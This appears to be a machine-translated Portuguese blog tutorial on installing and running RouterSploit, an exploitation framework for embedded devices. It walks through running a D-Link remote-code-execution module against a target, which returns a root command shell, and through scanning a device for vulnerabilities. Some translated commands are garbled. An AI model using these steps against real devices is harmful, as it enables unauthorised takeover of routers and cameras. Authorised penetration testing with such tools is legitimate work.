RouterSploit é uma estrutura de exploração incrível feita especificamente para dispositivos embarcados.
Esta ferramenta pode ser usada pelo pentester para verificar a segurança de câmeras e roteadores.
Conteúdo
Destaques do RouterSploit:
- Codificado em Python.
- Interface da Linha de comando.
- Suporte Docker.
- Ferramentas Modulares.
SO compatível:
- Mac OS.
- Linux.
- Telefone Android.
- janelas.
Instalando o RouterSploit:
Requisitos:
- futuro
- solicitações de
- paramiko
- pysnmp
- criptografado
Opcional:
- azulado – bluetooth de baixa energia
Instalando no Kali Linux:
Siga os comandos abaixo:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Suporte Bluetooth de baixa energia:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Instalando no Ubuntu:
Siga os comandos abaixo:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Suporte Bluetooth de baixa energia:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
Instalando no MacOS:
Siga os comandos abaixo:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
Instalando no Docker:
Siga os comandos abaixo:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
Como atualizar o RouterSploit?
Você precisa atualizar o RouterSploit com frequência para evitar transtornos.
Novos módulos são enviados quase todos os dias.
cd routersploit
git pull
Como usar o RouterSploit?
Uso
raiz@kalidev:~/git/routersploit# ./rsf.py ______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_ | // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_ \_| \____/ __,_|\_____|_| \____/| .__/|_|\___/|_|\__| | | Estrutura de Exploração para |_| by Threat9 Embedded Devices Codename : I Knew You Were Trouble Version : 3.3.0 Pagina inicial : https://www.threat9.com/ - @threatnine Join Slack : routersploit.slack.com Join Threat9 Beta Program - https://www.threat9.com/ Exploits: 128 Scanners: 4 Créditos: 165 Genérico: 4 Cargas úteis: 32 Codificadores: 6 rsf >
Explorações:
Para pré-formar a exploração, basta escolher o módulo e definir o alvo:
rsf > use exploits/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > use exploits/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600RCE) >
Para completar use a tecla tab.
Para exibir opções, tiposhow
:
rsf (D-LINK DIR-300 & DIR-600RCE) > show options
Target options:
Nome Configurações atuais Descrição
---- ---------------- -----------
alvo Endereço de destino, por exemplo. http://192.168.1.1
porta 80 Porta alvo
Usarrun
ouexploit
comando para explorar o alvo:
rsf (D-LINK DIR-300 & DIR-600RCE) > correr
[+] O alvo é vulnerável
[*] Invocando loop de comando...
cmd > whoami
root
Para definir opções:
rsf (D-LINK DIR-300 & DIR-600RCE) > definir http de destino://192.168.1.1 [+] {'target': 'http://192.168.1.1'}
É possível verificar se o alvo está vulnerável a uma exploração específica:
rsf (D-LINK DIR-300 & DIR-600RCE) > verificar [+] O alvo é vulnerável
Corrershow info
para exibir informações sobre a exploração.
Verificando alvos vulneráveis:
Os scanners permitem verificar rapidamente se o alvo está vulnerável a alguma exploração.
Use os mesmos comandos para exibir/definir opções, e também para correr.
rsf (Scanner DLink) > correr [+] exploits/dlink/dwr_932_info_disclosure é vulnerável [-] exploits/dlink/dir_300_320_615_auth_bypass não é vulnerável [-] exploits/dlink/dsl_2750b_info_disclosure não é vulnerável [-] exploits/dlink/dns_320l_327l_rce não é vulnerável [-] exploits/dlink/dir_645_password_disclosure não é vulnerável [-] exploits/dlink/dir_300_600_615_info_disclosure não é vulnerável [-] exploits/dlink/dir_300_600_rce não é vulnerável [+] O dispositivo está vulnerável! - explorações/dlink/dwr_932_info_disclosure
Leia também: 1337procuração
Palavras Finais:
RouterSploit é uma ferramenta incrível de usar.
Se você enfrentar qualquer problema relacionado ao RouterSploit. Certifique-se de comentar abaixo. Nossa equipe CSHAWK entrará em contato com você o mais rápido possível.